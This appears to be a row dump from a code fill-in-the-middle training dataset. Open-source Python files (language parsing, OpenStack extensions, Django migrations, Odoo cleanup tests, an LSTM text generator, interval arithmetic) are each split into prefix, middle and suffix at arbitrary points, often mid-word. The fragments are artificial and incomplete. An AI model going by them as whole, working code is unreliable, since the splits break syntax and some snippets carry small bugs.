repo_name
stringlengths 5
100
| path
stringlengths 4
231
| language
stringclasses 1
value | license
stringclasses 15
values | size
int64 6
947k
| score
float64 0
0.34
| prefix
stringlengths 0
8.16k
| middle
stringlengths 3
512
| suffix
stringlengths 0
8.17k
|
---|---|---|---|---|---|---|---|---|
nabsboss/CouchPotatoServer
|
libs/guessit/language.py
|
Python
|
gpl-3.0
| 13,102 | 0.003207 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# GuessIt - A library for guessing information from filenames
# Copyright (c) 2011 Nicolas Wack <wackou@gmail.com>
#
# GuessIt is free software; you can redistribute it and/or modify it under
# the terms of the Lesser GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# GuessIt is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# Lesser GNU General Public License for more details.
#
# You should have received a copy of the Lesser GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import unicode_literals
from guessit import UnicodeMixin, base_text_type, u, s
from guessit.fileutils import load_file_in_same_dir
from guessit.country import Country
import re
import logging
__all__ = [ 'is_iso_language', 'is_language', 'lang_set', 'Language',
'ALL_LANGUAGES', 'ALL_LANGUAGES_NAMES', 'UNDETERMINED',
'search_language' ]
log = logging.getLogger(__name__)
# downloaded from http://www.loc.gov/standards/iso639-2/ISO-639-2_utf-8.txt
#
# Description of the fields:
# "An alpha-3 (bibliographic) code, an alpha-3 (terminologic) code (when given),
# an alpha-2 code (when given), an English name, and a French name of a language
# are all separated by pipe (|) characters."
_iso639_contents = load_file_in_same_dir(__file__, 'ISO-639-2_utf-8.txt')
# drop the BOM from the beginning of the file
_iso639_contents = _iso639_contents[1:]
language_matrix = [ l.strip().split('|')
for l in _iso639_contents.strip().split('\n') ]
# update information in the language matrix
language_matrix += [['mol', '', 'mo', 'Moldavian', 'moldave'],
['ass', '', '', 'Assyrian', 'assyrien']]
for lang in language_matrix:
# remove unused languages that shadow other common ones with a non-official form
if (lang[2] == 'se' or # Northern Sami shadows Swedish
lang[2] == 'br'): # Breton shadows Brazilian
lang[2] = ''
# add missing information
if lang[0] == 'und':
lang[2] = 'un'
if lang[0] == 'srp':
lang[1] = 'scc' # from OpenSubtitles
lng3 = frozenset(l[0] for l in language_matrix if l[0])
lng3term = frozenset(l[1] for l in language_matrix if l[1])
lng2 = frozenset(l[2] for l in language_matrix if l[2])
lng_en_name = frozenset(lng for l in language_matrix
for lng in l[3].lower().split('; ') if lng)
lng_fr_name = frozenset(lng for l in language_matrix
for lng in l[4].lower().split('; ') if lng)
lng_all_names = lng3 | lng3term | lng2 | lng_en_name | lng_fr_name
lng3_to_lng3term = dict((l[0], l[1]) for l in language_matrix if l[1])
lng3term_to_lng3 = dict((l[1], l[0]) for l in language_matrix if l[1])
lng3_to_lng2 = dict((l[0], l[2]) for l in language_matrix if l[2])
lng2_to_lng3 = dict((l[2], l[0]) for l in language_matrix if l[2])
# we only return the first given english name, hoping it is the most used one
lng3_to_lng_en_name = dict((l[0], l[3].split('; ')[0])
for l in language_matrix if l[3])
lng_en_name_to_lng3 = dict((en_name.lower(), l[0])
for l in language_matrix if l[3]
for en_name in l[3].split('; '))
# we only return the first given french name, hoping it is the most used one
lng3_to_lng_fr_name = dict((l[0], l[4].split('; ')[0])
for l in language_matrix if l[4])
lng_fr_name_to_lng3 = dict((fr_name.lower(), l[0])
for l in language_matrix if l[4]
for fr_name in l[4].split('; '))
# contains a list of exceptions: strings that should be parsed as a language
# but which are not in an ISO form
lng_exceptions = { 'unknown': ('und', None),
'inconnu': ('und', None),
'unk': ('und', None),
'un': ('und', None),
'gr': ('gre', None),
'greek': ('gre', None),
'esp': ('spa', None),
'español': ('spa', None),
'se': ('swe', None),
'po': ('pt', 'br'),
'pb': ('pt', 'br'),
'pob': ('pt', 'br'),
'br': ('pt', 'br'),
'brazilian': ('pt', 'br'),
|
'català': ('cat', None),
'cz': ('cze', None),
'ua': ('ukr', None),
'cn': ('chi', None),
'chs': ('chi', None),
'jp': ('jpn', None),
|
'scr': ('hrv', None)
}
def is_iso_language(language):
return language.lower() in lng_all_names
def is_language(language):
return is_iso_language(language) or language in lng_exceptions
def lang_set(languages, strict=False):
"""Return a set of guessit.Language created from their given string
representation.
if strict is True, then this will raise an exception if any language
could not be identified.
"""
return set(Language(l, strict=strict) for l in languages)
class Language(UnicodeMixin):
"""This class represents a human language.
You can initialize it with pretty much anything, as it knows conversion
from ISO-639 2-letter and 3-letter codes, English and French names.
You can also distinguish languages for specific countries, such as
Portuguese and Brazilian Portuguese.
There are various properties on the language object that give you the
representation of the language for a specific usage, such as .alpha3
to get the ISO 3-letter code, or .opensubtitles to get the OpenSubtitles
language code.
>>> Language('fr')
Language(French)
>>> s(Language('eng').french_name)
'anglais'
>>> s(Language('pt(br)').country.english_name)
'Brazil'
>>> s(Language('Español (Latinoamérica)').country.english_name)
'Latin America'
>>> Language('Spanish (Latin America)') == Language('Español (Latinoamérica)')
True
>>> s(Language('zz', strict=False).english_name)
'Undetermined'
>>> s(Language('pt(br)').opensubtitles)
'pob'
"""
_with_country_regexp = re.compile('(.*)\((.*)\)')
_with_country_regexp2 = re.compile('(.*)-(.*)')
def __init__(self, language, country=None, strict=False, scheme=None):
language = u(language.strip().lower())
with_country = (Language._with_country_regexp.match(language) or
Language._with_country_regexp2.match(language))
if with_country:
self.lang = Language(with_country.group(1)).lang
self.country = Country(with_country.group(2))
return
self.lang = None
self.country = Country(country) if country else None
# first look for scheme specific languages
if scheme == 'opensubtitles':
if language == 'br':
self.lang = 'bre'
return
elif language == 'se':
self.lang = 'sme'
return
elif scheme is not None:
log.warning('Unrecognized scheme: "%s" - Proceeding with standard one' % scheme)
# look for ISO language codes
if len(language) == 2:
self.lang = lng2_to_lng3.get(language)
elif len(language) == 3:
self.lang = (language
if language in lng3
else lng3term_to_lng3.get(language))
else:
self.lang = (lng_en_name_to_lng3.get(language) or
lng_fr_name_to_lng3.get(language))
# general language exceptions
if self.lang is None and language in lng_exceptions:
lang, country = lng_exceptions[language]
self.lang = Language(lang).alpha3
self.country = Country(country) if country else None
msg = 'The give
|
rcbops/nova-buildpackage
|
nova/api/openstack/compute/contrib/server_start_stop.py
|
Python
|
apache-2.0
| 2,721 | 0 |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 Midokura Japan K.K.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License
import webob
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova import compute
from nova import exception
from nova import log as logging
LOG = logging.getLogger('nova.api.openstack.compute.contrib.server_start_stop')
class ServerStartStopActionController(wsgi.Contro
|
ller):
def __init__(self, *args, **kwargs):
super(ServerStartStopActionController, self).__init__(*args, **kwargs)
self.compute_api = compute.API()
@wsgi.action('os-start')
def _start_server(self, req, id, body):
"""Start an instance. """
context = req.environ['nova.context']
try:
LOG.debug(_("start instance %r"),
|
id)
instance = self.compute_api.get(context, id)
self.compute_api.start(context, instance)
except exception.ApiError, e:
raise webob.exc.HTTPBadRequest(explanation=e.message)
except exception.NotAuthorized, e:
raise webob.exc.HTTPUnauthorized()
return webob.Response(status_int=202)
@wsgi.action('os-stop')
def _stop_server(self, req, id, body):
"""Stop an instance."""
context = req.environ['nova.context']
try:
LOG.debug(_("stop instance %r"), id)
instance = self.compute_api.get(context, id)
self.compute_api.stop(context, instance)
except exception.ApiError, e:
raise webob.exc.HTTPBadRequest(explanation=e.message)
except exception.NotAuthorized, e:
raise webob.exc.HTTPUnauthorized()
return webob.Response(status_int=202)
class Server_start_stop(extensions.ExtensionDescriptor):
"""Start/Stop instance compute API support"""
name = "ServerStartStop"
namespace = "http://docs.openstack.org/compute/ext/servers/api/v1.1"
updated = "2012-01-23:00:00+00:00"
def get_controller_extensions(self):
controller = ServerStartStopActionController()
extension = extensions.ControllerExtension(self, 'servers', controller)
return [extension]
|
mod2/momentum
|
momentum/migrations/0010_target_data_migration.py
|
Python
|
mit
| 517 | 0.003868 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
d
|
ef populate_target_amount(apps, schema_editor):
Entry = apps.get_model("momentum", "Entry")
for entry in Entry.objects.all():
entry.target_amount = entry.goal.target_amount
entry.save()
class Migration(migrations.Migration):
dependencies = [
('momentum', '0009_entry_target_amount'),
]
oper
|
ations = [
migrations.RunPython(populate_target_amount),
]
|
scopatz/regolith
|
regolith/sorters.py
|
Python
|
cc0-1.0
| 2,389 | 0.002093 |
"""Builder for websites."""
import string
from regolith.dates import date_to_float
doc_date_key = lambda x: date_to_float(
x.get("year", 1970), x.get("month", "jan")
)
ene_date_key = lambda x: date_to_float(
x.get("end_year", 4242), x.get("end_month", "dec")
)
category_val = lambda x: x.get("category", "<uncategorized>")
level_val = lambda x: x.get("level", "<no-level>")
id_key = lambda x: x.get("_id", "")
def date_key(x):
if "end_year" in x:
v = date_to_float(
x["end_year"], x.get("end_month", "jan"), x.get("end_day", 0)
)
elif "year" in x:
v = date_to_float(x["year"], x.get("month", "jan"), x.get("day", 0))
elif "begin_year" in x:
v = date_to_float(
x["begin_year"], x.get("begin_month", "jan"), x.get("begin_day", 0)
)
else:
raise KeyError("could not find year in " + str(x))
return v
POSITION_LEVELS = {
"": -1,
"editor": -1,
"unknown": -1,
"undergraduate research assistant": 1,
"intern": 1,
"masters research assistant": 2,
"visiting student": 1,
"graduate research assistant": 3,
"teaching assistant": 3,
"research assistant": 2,
"post-doctoral scholar": 4,
"research fellow": 4,
"assistant scientist": 4,
"assistant lecturer": 4,
"lecturer": 5,
"research scientist": 4.5,
"associate scientist": 5,
"adjunct scientist": 5,
"senior assistant lecturer": 5,
"research associate": 5,
"reader": 5,
"ajunct professor": 5,
"adjunct professor": 5,
"consultant": 5,
"programer": 5,
"programmer": 5,
"visiting scientist": 6,
"research assistant professor": 4,
"assistant profes
|
sor": 8,
"assistant physicist": 8,
"associate professor": 9,
"associate physicist": 9,
"professor emeritus": 9,
"visiting professor": 9,
"manager": 10,
"director": 10,
"scientist": 10,
"engineer": 10,
"physicist": 10,
"professor": 11,
"president": 10,
"distinguished professor": 12
}
def position_key(x):
"""Sorts a people based on thier position in the resear
|
ch group."""
pos = x.get("position", "").lower()
first_letter_last = x.get("name", "zappa").rsplit(None, 1)[-1][0].upper()
backward_position = 26 - string.ascii_uppercase.index(first_letter_last)
return POSITION_LEVELS.get(pos, -1), backward_position
|
pism/pism
|
doc/acknowledge.py
|
Python
|
gpl-3.0
| 3,113 | 0.004497 |
#!/usr/bin/env python3
header = """
..
DO NOT EDIT: This file was automatically generated by running doc/acknowledge.py
Edit doc/acknowledge.py, doc/funding.csv, and doc/citing-pism.bib
"""
acknowledgement = """
Acknowledging PISM funding sources
----------------------------------
If you use PISM in a publication then we ask for an acknowledgement of funding and a
citation. However, unless PISM developers are involved in the preparation of the
publication at the usual co-author level, we do not expect co-authorship on PISM-using
papers.
To acknowledge PISM funding please include the statement:
"""
citing = """
Citing
------
To cite PISM please use at least one of Bueler and Brown (2009) or Winkelmann et al.
(2011), below, as appropriate to the application.
Do not forget to specify the PISM *version* you use. If your results came from source code
modifications to PISM then we request that your publication say so explicitly.
If your study relies heavily on certain PISM sub-models (such as hydrology, calving,
fracture mechanics, thermodynamics) please contact the corresponding author/developer for
information on additional citations.
.. code::
"""
import csv
import time
import sys
import argparse
parser = argparse.ArgumentParser()
parser.description = '''Generate a funding acknowledgment string.'''
parser.add_argument("--manual", action="store_true")
options = parser.parse_args()
year = time.gmtime(time.time())[0]
funding = {}
with open("funding.csv", "r") as f:
reader = csv.reader(f, skipinitialspace=True, quoting=csv.QUOTE_ALL)
funding = {}
for row in reader:
start_year, end_year, agency, number, _ = row
try:
start_year = int(start_year)
end_year = int(end_year)
except:
continue
# skip grants for which we don't have a number (yet)
if number.strip() == "":
continue
if start_year <= year and year <= end_year:
try:
funding[agency].append(number)
except:
funding[agency] = [number]
def join(strings):
assert len(strings) > 0
if len(strings) == 1:
return strings[0]
elif len(strings) == 2:
return "{} and {}".format(strings[0], strings[
|
1])
else:
return join(["{}, {}".format(strings[0], strings[1]),
join(strings[2:])])
grants = []
for k, v in funding.items():
grant = "grant"
if len(v) > 1:
grant = "grants"
grants.append("{agency} {grant} {number}".format(agency=k,
grant=grant,
number=join(v)))
if options.
|
manual:
print(header)
print("""
Development of PISM is supported by {grants}.""".format(grants=join(grants)))
else:
print(header)
print(acknowledgement)
print("""
Development of PISM is supported by {grants}.
""".format(grants=join(grants)))
print(citing)
with open("citing-pism.bib") as f:
for line in f:
sys.stdout.write(" {}".format(line))
|
be-cloud-be/horizon-addons
|
server-tools/database_cleanup/tests/test_database_cleanup.py
|
Python
|
agpl-3.0
| 4,939 | 0 |
# -*- coding: utf-8 -*-
# © 2016 Therp BV <http://therp.nl>
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl.html).
from psycopg2 import ProgrammingError
from openerp.modules.registry import RegistryManager
from openerp.tools import config
from openerp.tests.common import TransactionCase, at_install, post_install
# Use post_install to get all models loaded more info: odoo/odoo#13458
@at_install(False)
@post_install(True)
class TestDatabaseCleanup(TransactionCase):
def setUp(self):
super(TestDatabaseCleanup, self).setUp()
self.module = None
self.model = None
def test_database_cleanup(self):
# create an orphaned column
self.cr.execute(
'alter table res_partner add column database_cleanup_test int')
# We need use a model that is not blocked (Avoid use res.users)
partner_model = self.env['ir.model'].search([
('model', '=', 'res.partner')], limit=1)
purge_columns = self.env['cleanup.purge.wizard.column'].create({
'purge_line_ids': [(0, 0, {
'model_id': partner_model.id, 'name': 'database_cleanup_test'}
)]})
purge_columns.purge_all()
# must be removed by the wizard
with self.assertRaises(ProgrammingError):
with self.registry.cursor() as cr:
cr.execute('select database_cleanup_test from res_partner')
# create a data entry pointing nowhere
self.cr.execute('select max(id) + 1 from res_users')
self.env['ir.model.data'].create({
'module': 'database_cleanup',
'name': 'test_no_data_entry',
'model': 'res.users',
'res_id': self.cr.fetchone()[0],
})
purge_data = self.env['cleanup.purge.wizard.data'].create({})
purge_data.purge_all()
# must be removed by the wizard
with self.assertRaises(ValueError):
self.env.ref('database_cleanup.test_no_data_entry')
# create a nonexistent model
self.model = self.env['ir.model'].create({
'name': 'Database cleanup test model',
'model': 'x_database.cleanup.test.model',
})
self.env.cr.execute(
'insert into ir_attachment (name, res_model, res_id, type) values '
"('test attachment', 'database.cleanup.test.model', 42, 'binary')")
self.registry.models.pop('x_database.cleanup.test.model')
self.registry._pure_function_fields.pop(
'x_database.cleanup.test.model')
purge_models = self.env['cleanup.purge.wizard.model'].create({})
with self.assertRaisesRegexp(KeyError,
'x_database.cleanup.test.model'):
# TODO: Remove with-assert of KeyError after fix:
# https://github.com/odoo/odoo/pull/13978/files#r88654967
purge_models.purge_all()
# must be removed by the wizard
self.assertFalse(self.env['ir.model'].search([
('model', '=', 'x_database.cleanup.test.model'),
]))
# create a nonexistent module
self.module = self.env['ir.module.module'].create({
'name': 'database_cleanup_test',
'state': 'to upgrade',
})
purge_modules = self.env['cleanup.purge.wizard.module'].create({})
# this reloads our registry, and we don't want to run tests twice
# we also need the original registry for further tests, so save a
# reference to it
original_registry = RegistryManager.registries[self.env.cr.dbname]
config.options['test_enable'] = False
purge_modules.purge_all()
config.options['test_enable'] = True
# must be removed by the wizard
self.assertFalse(self.env['ir.module.module'].search([
('name', '=', 'database_cleanup_test'),
]))
# reset afterwards
RegistryManager.registries[self.env.cr.dbname] = original_registry
# create an orphaned table
self.env.cr.execute('create table database_cleanup_test (test int)')
purge_tables = self.env['cleanup.purge.wizard.table'].create({})
purge_tables.
|
purge_all()
with self.assertRaises(ProgrammingError):
with self.registry.cursor() as cr:
self.env.cr.execute('select * from database_cleanup_test')
def tearDown(self):
super(TestDatabaseCleanup, self).tearDown()
with self.registry.cursor() as cr2:
# Release blocked tables with pending deletes
self.env.cr.r
|
ollback()
if self.module:
cr2.execute(
"DELETE FROM ir_module_module WHERE id=%s",
(self.module.id,))
if self.model:
cr2.execute(
"DELETE FROM ir_model WHERE id=%s",
(self.model.id,))
cr2.commit()
|
gleitz/howdoi
|
howdoi/__main__.py
|
Python
|
mit
| 63 | 0 |
f
|
rom .howdoi import command_line_runner
command_line
|
_runner()
|
dev-coop/meancoach
|
meancoach_project/apps/meancoach/tests/smoke_tests.py
|
Python
|
mit
| 258 | 0 |
from django.core.urlresolvers import r
|
everse
from django.test import TestCase
class SmokeTestMeanCoach(TestCase):
def test_index_page_returns_200(self):
resp = self.client.get(reverse('meancoach:index'
|
))
assert resp.status_code == 200
|
antoinedube/numeric-cookiecutter
|
{{cookiecutter.namespace+'.'+cookiecutter.project_slug}}/{{cookiecutter.project_slug}}/commands/configure.py
|
Python
|
gpl-3.0
| 571 | 0.003503 |
#!/usr/bin/python
# coding: utf8
import os
import subprocess
from '{% if cookiecutter.namespace %}{{ cookiecu
|
tter.namespace }}.{{ cookiecutter.project_slug }}{% else %}{{ cookiecutter.project_slug }}{% endif %}'.commands.base import BaseCommand
from '{% if cookiecutter.namespace %}{{ cookiecutter.namespace }}.{{ cookiecutter.project_slug }}{% else %}{{ cookiecutter.project_slug }}{% endif %}' import
|
PROJECT_DIR
class Configure(BaseCommand):
def execute(self):
os.chdir(os.path.join(PROJECT_DIR, 'build'))
subprocess.run(['cmake', PROJECT_DIR])
|
QCaudron/ivanatrumpalot
|
code/train_lstm.py
|
Python
|
mit
| 5,169 | 0.003289 |
import sys
import re
import numpy as np
import json
import pickle
from string import ascii_letters
from keras.models import S
|
equential, model_from_json
from keras.layers import Dense, Activation, Dropout
from keras.layers import LSTM
from ivanatrumpalot import clean_text, predict, sample
# This code is heavily influenced by the Keras example code on LSTM for text generation :
# https://github.com/fchollet/keras/blob/master/examples/lstm_text_generation.py
# US
|
AGE :
# python train_lstm.py [mode]
# If no arguments are passed, this will train a new model, saving the model's architecture
# to model.json and its weights to weights.h5.
# If [mode] is passed, valid options are "extend" and "predict".
# If the string "extend" is passed, they must be the files saved by train_lstm.py previously.
# If the string "predict" is passed,
# Code directory
os.chdir("/root/ivanatrumpalot/code")
# Read and clean corpus
text = clean_text(open("../data/trump_corpus").read())
# Corpus length
print("Corpus : {} characters, approximately {} sentences.".format(len(text), len(text.split("."))))
# Generate a dictionaries mapping from characters in our alphabet to an index, and the reverse
alphabet = set(text).union(set(ascii_letters)).union(set("1234567890"))
alphabet_size = len(alphabet)
alphabet_indices = dict((c, i) for i, c in enumerate(alphabet))
indices_alphabet = dict((i, c) for i, c in enumerate(alphabet))
print("Size of the alphabet : {} characters.".format(alphabet_size))
# Generate sequences of characters that the RNN will use to predict the next character.
primer_length = 50
step = 3
sentences = []
next_character = []
for i in range(0, len(text) - primer_length, step):
sentences.append(text[i : i + primer_length])
next_character.append(text[i + primer_length])
print("Number of sequences generated from the corpus : {}.".format(len(sentences)))
# Vectorise the text sequences : go from N sentences of length primer_length to
# a binary array of size (N, primer_length, alphabet_size). Do the same for the
# next_character array.
print("Vectorising.")
X = np.zeros((len(sentences), primer_length, alphabet_size), dtype=np.bool)
y = np.zeros((len(sentences), alphabet_size), dtype=np.bool)
for i, sentence in enumerate(sentences):
for t, char in enumerate(sentence):
X[i, t, alphabet_indices[char]] = 1
y[i, alphabet_indices[next_character[i]]] = 1
# Pickle the necessary objects for future prediction
required_objects = { "alphabet" : alphabet,
"alphabet_indices" : alphabet_indices,
"indices_alphabet" : indices_alphabet,
"primer_length" : primer_length
}
with open("required_objects.pickle", "wb") as f:
pickle.dump(required_objects, f)
# The current model is a four-layer LSTM network with a dropout layer between each hidden layer.
print("Building the model.")
model = Sequential()
model.add(LSTM(128, return_sequences=True, init="glorot_uniform",
input_shape=(primer_length, len(alphabet))))
model.add(Dropout(0.2))
model.add(LSTM(256, return_sequences=True, init="glorot_uniform"))
model.add(Dropout(0.2))
model.add(LSTM(512, return_sequences=True, init="glorot_uniform"))
model.add(Dropout(0.2))
model.add(LSTM(512, return_sequences=False, init="glorot_uniform"))
model.add(Dropout(0.2))
model.add(Dense(len(alphabet)))
model.add(Activation('softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adam')
model.summary()
# Train the model for 250 epochs, outputting some generated text every five iterations
# Save the model every five epochs, just in case training is interrupted
for iteration in range(1, 50):
print("\n" + "-" * 50)
print("Iteration {}".format(iteration))
# Train the model for five epochs
model.fit(X, y, batch_size=128, nb_epoch=5, shuffle=True)
# Pick a random part of the text to use as a prompt
start_index = np.random.randint(0, len(text) - primer_length - 1)
# For various energies in the probability distribution,
# create some 200-character sample strings
for diversity in [0.2, 0.5, 1.0, 1.2]:
print("\n----- Diversity : {}".format(diversity))
generated = ""
sentence = text[start_index : start_index + primer_length]
generated += sentence
print("----- Generating with prompt : {}".format(sentence))
sys.stdout.write(generated)
# Generate 100 characters
for i in range(100):
x = np.zeros((1, primer_length, len(alphabet)))
for t, char in enumerate(sentence):
x[0, t, alphabet_indices[char]] = 1.
predictions = model.predict(x, verbose=0)[0]
next_index = sample(predictions, diversity)
next_char = indices_alphabet[next_index]
generated += next_char
sentence = sentence[1:] + next_char
sys.stdout.write(next_char)
sys.stdout.flush()
print("\n")
# Save the model architecture and weights to file
model.save_weights("weights.h5", overwrite=True)
with open("model.json", "w") as f:
f.write(model.to_json())
|
hksonngan/pynopticon
|
src/pynopticon/link_to_orange.py
|
Python
|
gpl-3.0
| 628 | 0.012739 |
import os.path
import shutil
try:
import OWGUI
except ImportError:
print "Orange could not be imported."
try:
import pynopticon
except ImportError:
print "Pynopticon could not be imported, you need to install it first."
def link_to_orange():
orangeWidgetsPath = os.path.join(os.path.split(OWGUI.__file__)[0], 'Pynopticon')
pncWidgetsPath = os.path.join(pynopticon.__path__[0], 'widgets')
print "Copying pynopticon widgets to orange widgets directory..."
shutil.copytree(pncWidgetsPath, orangeWidge
|
tsPath)
print "Successfull"
if __name__=='__main__':
link_to_orange(
|
)
|
Krigu/python_fun
|
Pland1/Parser.py
|
Python
|
gpl-3.0
| 1,456 | 0.000687 |
from collections import defaultdict
def check_for_hits(planets, counts
|
):
total = 0
for planet in planets():
|
if counts(planet):
total += 1
return total
def parse():
actions = {"U": (lambda: map_x[x], lambda j: j > y),
"D": (lambda: map_x[x], lambda j: j < y),
"L": (lambda: map_y[y], lambda j: j < x),
"R": (lambda: map_y[y], lambda j: j > x) }
for x in range(1, 8):
file_name = "%02d" % x
input_file = open(file_name + ".in")
lines = input_file.read().splitlines()
planets, ships = lines[0].split(" ")
map_x = defaultdict(list)
map_y = defaultdict(list)
for i in range(1, int(planets) + 1):
x, y = [int(k) for k in lines[i].split(" ")]
map_x[x] += [y]
map_y[y] += [x]
start = int(planets) + 1
hit_list = []
for i in range(start, start + int(ships)):
x, y, direction = lines[i].split(" ")
x, y = int(x), int(y)
action = actions[direction]
if not action:
raise "Invalid direction value %s" % direction
hits = check_for_hits(action[0], action[1])
hit_list.append(hits)
output_file = open(file_name + ".out")
should_be = [int(k) for k in output_file.readlines()]
assert hit_list == should_be
if __name__ == '__main__':
parse()
|
stonestone/stonefreedomsponsors
|
djangoproject/core/views/watch_views.py
|
Python
|
agpl-3.0
| 558 | 0.003584 |
# Create your views here.
from django.contrib.auth.decorators import login_required
from core.models import *
from django.http import HttpResponse
from core.s
|
ervices import watch_services
from django.utils.translation import ugettext as _
@l
|
ogin_required
def watchIssue(request, issue_id):
watch_services.watch_issue(request.user, int(issue_id), Watch.WATCHED)
return HttpResponse('WATCHING')
@login_required
def unwatchIssue(request, issue_id):
watch_services.unwatch_issue(request.user, int(issue_id))
return HttpResponse('NOT_WATCHING')
|
gitsimon/spadup-lyra
|
abstract_domains/numerical/interval_domain.py
|
Python
|
mpl-2.0
| 13,333 | 0.001876 |
from copy import deepcopy
from math import inf
from numbers import Number
from typing import List, Union
from abstract_domains.lattice import BottomMixin
from abstract_domains.numerical.numerical import NumericalMixin
from abstract_domains.state import State
from abstract_domains.store import Store
from core.expressions import *
from core.expressions_tools import ExpressionVisitor
def _auto_convert_numbers(func):
def func_wrapper(self, other: Union[Number, 'Interval']):
if isinstance(other, Number):
other = Interval(other, other)
return func(self, other)
return func_wrapper
def _check_types(func):
def func_wrapper(self, other: 'Interval'):
if not issubclass(self.__class__, Interval) or not issubclass(other.__class__, Interval):
return NotImplemented
return func(self, other)
return func_wrapper
def _check_non_empty(func):
def func_wrapper(self, other: 'Interval'):
if self.empty() or other.empty():
raise ValueError("Empty intervals are not comparable!")
return func(self, other)
return func_wrapper
class Interval:
def __init__(self, lower=-inf, upper=inf):
"""Create an interval lattice for a single variable.
"""
super().__init__()
assert lower is not None and upper is not None
self._lower = lower
self._upper = upper
@staticmethod
def from_constant(constant):
interval = Interval(constant, constant)
return interval
@property
def lower(self):
if self.empty():
return None
else:
return self._lower
@lower.setter
def lower(self, b):
assert b is not None
self._lower = b
@property
def upper(self):
if self.empty():
return None
else:
return self._upper
@upper.setter
def upper(self, b):
assert b is not None
self._upper = b
@property
def interval(self):
if self.empty():
return None
else:
return self.lower, self.upper
@interval.setter
def interval(self, bounds):
(lower, upper) = bounds
self.lower = lower
self.upper = upper
def empty(self) -> bool:
"""Return `True` if this interval is empty."""
return self._lower > self._upper
def set_empty(self) -> 'Interval':
"""Set this interval to be empty."""
self.interval = (1, 0)
return self
def finite(self) -> bool:
"""Return `True` if this interval is finite."""
return not ({self.lower, self.upper} & {-inf, inf})
def is_constant(self) -> bool:
"""Return `True` if this interval is equal to a single constant (different from infinity)."""
return self.lower == self.upper
@_check_types
def __eq__(self, other: 'Interval'):
return repr(self) == repr(other)
@_check_types
def __ne__(self, other: 'Interval'):
return not (self == other)
@_auto_convert_numbers
@_check_types
@_check_non_empty
def __lt__(self, other):
return self.upper < other.lower
@_auto_convert_numbers
@_check_types
@_check_non_empty
def __le__(self, other):
return self.upper <= other.lower
@_auto_convert_numbers
@_check_types
@_check_non_empty
def __gt__(self, other):
return self.lower > other.upper
@_auto_convert_numbers
@_check_types
@_check_non_empty
def __ge__(self, other):
return self.lower >= other.upper
def __hash__(self):
return hash(repr(self))
def __repr__(self):
if self.empty():
return "∅"
else:
return f"[{self.lower},{self.upper}]"
# operators (they mutate self, no copy is made!!)
@_auto_convert_numbers
@_check_types
def add(self, other: Union['Interval', int]) -> 'Interval':
if self.empty() or other.empty():
return self.set_empty()
else:
self.interval = (self.lower + other.lower, self.upper + other.upper)
return self
@_auto_convert_numbers
@_chec
|
k_types
def sub(self, other: Union['Interval', int]) -> 'Interval':
if self.empty() or other.empty():
return self.set_empty()
|
else:
self.interval = (self.lower - other.upper, self.upper - other.lower)
return self
@_auto_convert_numbers
@_check_types
def mult(self, other: Union['Interval', int]) -> 'Interval':
if self.empty() or other.empty():
return self.set_empty()
else:
comb = [self.lower * other.lower, self.lower * other.upper, self.upper * other.lower,
self.upper * other.upper]
self.interval = (min(comb), max(comb))
return self
def negate(self) -> 'Interval':
if self.empty():
return self
else:
self.interval = (-self.upper, -self.lower)
return self
# overload operators (do not mutate self, return a modified copy)
def __pos__(self):
copy = deepcopy(self)
return copy
def __neg__(self):
copy = deepcopy(self)
return copy.negate()
def __add__(self, other):
copy = deepcopy(self)
return copy.add(other)
def __sub__(self, other):
copy = deepcopy(self)
return copy.sub(other)
def __mul__(self, other):
copy = deepcopy(self)
return copy.mult(other)
class IntervalLattice(Interval, BottomMixin):
@staticmethod
def from_constant(constant):
interval_lattice = IntervalLattice(constant, constant)
return interval_lattice
def __repr__(self):
if self.is_bottom():
return "⊥"
else:
return super().__repr__()
def top(self) -> 'IntervalLattice':
self.lower = -inf
self.upper = inf
return self
def is_top(self) -> bool:
return self._lower == -inf and self._upper == inf
def is_bottom(self) -> bool:
# we have to check if interval is empty, or got empty by an operation on this interval
if self.empty():
self.bottom()
return super().is_bottom()
def _less_equal(self, other: 'IntervalLattice') -> bool:
# NOTE: do not use less equal operator of plain interval since that has different semantics (every value in
# interval is less equal than any value in other interval)
return other.lower <= self.lower and self.upper <= other.upper
def _meet(self, other: 'IntervalLattice'):
self.lower = max(self.lower, other.lower)
self.upper = min(self.upper, other.upper)
return self
def _join(self, other: 'IntervalLattice') -> 'IntervalLattice':
self.lower = min(self.lower, other.lower)
self.upper = max(self.upper, other.upper)
return self
def _widening(self, other: 'IntervalLattice'):
if other.lower < self.lower:
self.lower = inf
if other.upper > self.upper:
self.upper = inf
return self
@classmethod
def evaluate(cls, expr: Expression):
"""Evaluates an expression without variables, interpreting constants in the interval domain.
If this method encounters any variables, it raises a ``ValueError``.
"""
return cls._visitor.visit(expr)
# noinspection PyPep8Naming
class Visitor(ExpressionVisitor):
"""A visitor to abstractly evaluate an expression (without variables) in the interval domain."""
def generic_visit(self, expr, *args, **kwargs):
raise ValueError(
f"{type(self)} does not support generic visit of expressions! "
f"Define handling for expression {type(expr)} explicitly!")
# noinspection PyMethodMayBeStatic, PyUnusedLocal
def visit_Index(self, _: Index, *args, **kwargs):
return IntervalLattice().top()
def visit_BinaryArithmeticOperation(self, expr: BinaryArithmeticOperation, *args, **kwargs):
l =
|
tylertian/Openstack
|
openstack F/glance/glance/__init__.py
|
Python
|
apache-2.0
| 733 | 0 |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010-2011 OpenStack LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
